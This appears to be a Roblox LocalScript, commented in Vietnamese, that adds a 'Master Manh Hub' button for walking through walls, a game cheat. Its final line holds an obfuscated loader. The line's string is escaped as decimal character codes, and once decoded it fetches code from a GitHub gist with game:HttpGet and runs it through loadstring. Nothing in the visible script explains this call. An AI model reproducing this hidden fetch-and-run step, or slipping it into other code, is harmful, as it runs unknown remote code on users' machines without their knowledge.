-- LocalScript: Điều khiển tính năng xuyên tường và giữ cho nhân vật không bị lơ lửng

-- Lấy đối tượng người chơi và nhân vật của họ
local player = game.Players.LocalPlayer

-- Tạo biến trạng thái xuyên tường
local wallPassEnabled = false
local character = player.Character or player.CharacterAdded:Wait()

-- Hàm để tạo GUI và nút
local function createGUI()
    -- Xóa GUI cũ nếu có
    if player:FindFirstChild("PlayerGui"):FindFirstChild("WallPassGui") then
        player:FindFirstChild("PlayerGui"):FindFirstChild("WallPassGui"):Destroy()
    end
    
    -- Tạo GUI mới
    local screenGui = Instance.new("ScreenGui")
    screenGui.Name = "WallPassGui"
    screenGui.Parent = player:WaitForChild("PlayerGui")

    -- Tạo nút Bật Xuyên Tường
    local toggleButton = Instance.new("TextButton")
    toggleButton.Size = UDim2.new(0, 150, 0, 50)
    toggleButton.Position = UDim2.new(0, 10, 0, 10)
    toggleButton.Text = "Bật Xuyên Tường"
    toggleButton.Parent = screenGui

    -- Tạo tên nhỏ "Master Manh Hub" ở góc nút Bật
    local nameLabel = Instance.new("TextLabel")
    nameLabel.Size = UDim2.new(0, 100, 0, 20)
    nameLabel.Position = UDim2.new(1, -110, 0, 30) -- Vị trí ở góc dưới bên phải của nút
    nameLabel.Text = "Master Manh Hub"
    nameLabel.TextSize = 14
    nameLabel.TextColor3 = Color3.fromRGB(255, 255, 255) -- Màu chữ trắng
    nameLabel.BackgroundTransparency = 1 -- Trong suốt nền
    nameLabel.Parent = toggleButton

    -- Tạo nút Tắt Xuyên Tường
    local toggleState = Instance.new("TextButton")
    toggleState.Size = UDim2.new(0, 150, 0, 50)
    toggleState.Position = UDim2.new(0, 10, 0, 70)
    toggleState.Text = "Tắt Xuyên Tường"
    toggleState.Parent = screenGui
    toggleState.Visible = false

    -- Tạo tên nhỏ "Master Manh Hub" ở góc nút Tắt
    local nameLabelState = Instance.new("TextLabel")
    nameLabelState.Size = UDim2.new(0, 100, 0, 20)
    nameLabelState.Position = UDim2.new(1, -110, 0, 30) -- Vị trí ở góc dưới bên phải của nút
    nameLabelState.Text = "Master Manh Hub"
    nameLabelState.TextSize = 14
    nameLabelState.TextColor3 = Color3.fromRGB(255, 255, 255) -- Màu chữ trắng
    nameLabelState.BackgroundTransparency = 1 -- Trong suốt nền
    nameLabelState.Parent = toggleState

    -- Hàm để bật/tắt xuyên tường
    local function toggleWallPass()
        wallPassEnabled = not wallPassEnabled
        if wallPassEnabled then
            -- Bật tính năng xuyên tường
            for _, part in pairs(character:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.CanCollide = false
                end
            end
            toggleButton.Visible = false
            toggleState.Visible = true
        else
            -- Tắt tính năng xuyên tường
            for _, part in pairs(character:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.CanCollide = true
                end
            end
            toggleButton.Visible = true
            toggleState.Visible = false
        end
    end

    -- Kết nối sự kiện cho nút
    toggleButton.MouseButton1Click:Connect(toggleWallPass)
    toggleState.MouseButton1Click:Connect(toggleWallPass)
end

-- Hàm xử lý khi nhân vật được thêm vào
local function onCharacterAdded(char)
    character = char
    -- Đặt lại trạng thái xuyên tường khi nhân vật được thêm vào (hồi sinh)
    wallPassEnabled = false
    createGUI()
end

-- Đảm bảo rằng tính năng xuyên tường không hoạt động nếu nhân vật chết
local function onCharacterDied()
    -- Đặt lại trạng thái xuyên tường
    wallPassEnabled = false
    createGUI()
end

-- Kết nối sự kiện cho nhân vật mới được thêm vào
player.CharacterAdded:Connect(onCharacterAdded)

-- Theo dõi sự kiện khi nhân vật chết
if character:FindFirstChild("Humanoid") then
    character.Humanoid.Died:Connect(onCharacterDied)
end

-- Tạo GUI lần đầu
createGUI()

-- Cập nhật trạng thái xuyên tường liên tục
game:GetService("RunService").Stepped:Connect(function()
    if wallPassEnabled and character and character:FindFirstChild("HumanoidRootPart") then
        for _, part in pairs(character:GetDescendants()) do
            if part:IsA("BasePart") then
                part.CanCollide = false
            end
        end
    end
end)
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
